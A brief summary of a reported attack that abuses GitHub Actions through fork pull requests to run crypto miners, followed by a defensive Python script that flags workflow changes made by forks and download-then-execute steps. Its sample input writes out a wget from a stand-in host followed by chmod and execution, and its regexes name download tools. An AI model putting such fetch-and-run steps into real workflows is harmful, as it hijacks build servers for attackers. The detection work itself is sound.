GitHub Actions is a CI/CD solution that makes it easy to set up periodic tasks for automating your software workflows. In the attack reported here, the threat actor forks a legitimate repository that has GitHub Actions enabled, injects malicious code into the forked version, and files a Pull Request asking the original repository's maintainers to merge the code back. In an unexpected twist, the attack does not need the maintainer of the original project to approve the malicious Pull Request. The malicious code loads a misnamed crypto miner from GitLab and runs it with the attacker’s wallet address.
Source: https://www.bleepingcomputer.com/news/security/github-actions-being-actively-abused-to-mine-cryptocurrency-on-github-servers/
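
A maintainer-side triage check for the pattern summarized above, as an added example that is not taken from the cited article: it flags fork Pull Requests that touch workflow files, and workflow changes that download from an untrusted host and then execute the result. The PR dictionary shape, the names `triage_pull_request` and `is_trusted`, the `gitlab.example` host, and the assumption that the injected code lands under `.github/workflows/` are all illustrative.

```python
import re

WORKFLOW_DIR = ".github/workflows/"  # assumption: injected code arrives here
# A download command followed by a URL; group 1 captures the host.
FETCH = re.compile(r"\b(?:curl|wget)\b[^\n]*?https?://([^/\s]+)", re.I)
# Signs that a downloaded file is then executed.
EXEC = re.compile(r"\|\s*(?:ba)?sh\b|chmod\s+\+x|(?:^|[\s;&])\./\S+", re.M)


def is_trusted(host, trusted_hosts):
    """True if host equals a trusted host or is a subdomain of one."""
    return any(host == t or host.endswith("." + t) for t in trusted_hosts)


def triage_pull_request(pr, trusted_hosts=("github.com",)):
    """Return (rule, path, detail) findings for one pull request.

    `pr` is a hypothetical dict (not the GitHub API schema) holding the head
    and base repository names and the added lines for each changed file.
    """
    findings = []
    from_fork = pr["head_repo"] != pr["base_repo"]
    for path, added_lines in pr["files"].items():
        if not path.startswith(WORKFLOW_DIR):
            continue
        if from_fork:
            findings.append(("workflow-changed-by-fork", path, pr["head_repo"]))
        text = "\n".join(added_lines)
        hosts = {m.group(1).lower() for m in FETCH.finditer(text)}
        untrusted = sorted(h for h in hosts if not is_trusted(h, trusted_hosts))
        if untrusted and EXEC.search(text):
            findings.append(("fetch-and-run", path, ",".join(untrusted)))
    return findings


# Constructed sample input (not real repositories, hosts or PR data).
SAMPLE_FORK_PR = {
    "head_repo": "contributor/project", "base_repo": "maintainer/project",
    "files": {
        ".github/workflows/ci.yml": [
            "      - run: wget -q https://gitlab.example/placeholder/tool",
            "      - run: chmod +x tool && ./tool",
        ],
        "README.md": ["typo fix"],
    },
}
SAMPLE_INTERNAL_PR = {
    "head_repo": "maintainer/project", "base_repo": "maintainer/project",
    "files": {".github/workflows/ci.yml": ["      - uses: actions/checkout@v4"]},
}

if __name__ == "__main__":
    for sample in (SAMPLE_FORK_PR, SAMPLE_INTERNAL_PR):
        print(sample["head_repo"], triage_pull_request(sample))
```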

